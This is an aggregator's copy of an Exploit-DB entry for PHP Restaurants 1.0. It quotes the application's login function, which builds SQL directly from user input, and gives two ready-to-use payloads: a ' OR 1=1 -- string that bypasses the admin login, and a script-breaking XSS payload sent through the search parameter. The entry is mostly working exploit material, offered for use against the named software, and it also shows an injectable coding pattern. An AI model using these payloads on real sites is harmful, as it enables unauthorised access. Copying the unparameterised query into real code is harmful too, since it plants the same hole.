11
[webapps] PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scri...
source link: https://www.exploit-db.com/exploits/51398
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting
# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS)
# Google Dork: None
# Date: 4/26/2023
# Exploit Author: Or4nG.M4n
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0
functions.php
function login(){
global $conn;
$email = $_POST['email'];
$pw = $_POST['password'];
$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` =
'".md5($pw)."'"; <-- there is No filter to secure sql query
parm[email][password]
$result = $conn->query($sql);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day
header('location: index.php');
}
} else {
header('location: login.php?m=Wrong Password');
}
}
login bypass at admin page /rest1/admin/login.php
email & password : ' OR 1=1 -- <- add [space] end of the payload
cross site scripting main page /index.php
xhttp.open("GET", "functions.php?f=getRestaurants<?php
if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we
can insert our xss payload
?>
", true);
xhttp.send();
</script> <-- when you insert your'e payload don't forget to add </script>
like
xss payload : </script><img onerror=alert(1) src=a>
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK